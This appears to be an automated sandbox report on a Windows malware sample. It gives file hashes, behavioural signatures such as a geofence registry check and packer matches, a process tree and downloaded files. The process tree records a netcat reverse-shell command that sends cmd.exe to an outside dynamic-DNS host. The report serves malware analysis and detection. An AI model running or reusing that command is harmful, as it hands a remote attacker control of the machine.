Analysis
  max time kernel: 141s
  max time network: 102s
  platform: windows10-2004_x64
  resource: win10v2004-20240709-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 20/07/2024, 08:45
Behavioral task: behavioral1
  Sample: 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
  Resource: win7-20240708-en
General
  Target: 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
  Size: 1.3MB
  MD5: 5fce41613d2bb16e353e5546106568a0
  SHA1: f8d76096e8cffe9ded2f1db2baf92e6a2d8edd02
  SHA256: 4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b
  SHA512: ce18f167146c13a5a328b8caa5cc774eec6543f37054ff2da261dab4190766d45249aa0b3a5f35d9d0d0ac0002c89465cb93757aca94f17d40b59a11243a18a7
  SSDEEP: 24576:ttWcmES7iPyMHnz0iI85ZDuGX88PHKEHZyCyLyub8LlRHYt9N+KsTOrJZ:to797iKMHoi3PDXVPfHghyub8LL69NQ2
Malware Config
Signatures
  Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
    Key value queried: \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation
    Process: 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
  Executes dropped EXE (1 IoC)
    PID 1188, Process nc1.exe
  YARA rule match: themida
    behavioral2/files/0x00070000000234c1-12.dat
  YARA rule match: upx
    behavioral2/memory/2724-0-0x0000000000400000-0x000000000057B000-memory.dmp
    behavioral2/memory/2724-16-0x0000000000400000-0x000000000057B000-memory.dmp
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  Suspicious use of WriteProcessMemory (6 IoCs)
    PID 2724 wrote to memory of 2212 (Process 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe, procid_target 85), 3 entries
    PID 2212 wrote to memory of 1188 (Process cmd.exe, procid_target 88), 3 entries
Processes
  1. C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
     Command line: "C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"
     PID: 2724
     - Checks computer location settings
     - Suspicious use of WriteProcessMemory
     2. C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\moi.bat" C:\Users\Admin\AppData\Local\Temp\"
        PID: 2212
        - Suspicious use of WriteProcessMemory
        3. C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\nc1.exe
           Command line: nc1 -d -e cmd.exe subprog.no-ip.biz 82
           PID: 1188
           - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads
  Download 1
    Filesize: 55B
    MD5: b10865d09b79c801d0ed79c38e1148b2
    SHA1: 927d484b37376dcb0a8223f89f06923664f75d3d
    SHA256: 7478f318af4b1dcb082609f0019ae994b58b8fc0e7ac2c278d9547c71c7fabf8
    SHA512: 89c21f6aec91738a60e9a849e0b0ceca330dab365b2c36e1c62a84b940bfd6921bb19381d5acfad18e169f4dd1ba0d2a85d5f0bdea1e3e721535c76e3c437768
  Download 2
    Filesize: 1.1MB
    MD5: a5923f2e7efaf747844e530baa7fe32a
    SHA1: 285559a6bf798ce6e9a49a1db2795d89e12675a7
    SHA256: 9dfaaa97fa17a13a490f3892bd4b3cb7c4424ab3607dcc00c3ab88987b7d7e30
    SHA512: fc8e9589cf0dc8b86f4a8f79619d0844cb2651342e049630fe6e6a22dbde65151c0571ac521e8823e5c5aeb3219c7b780f928b146bb6c2d673674235bdaf542e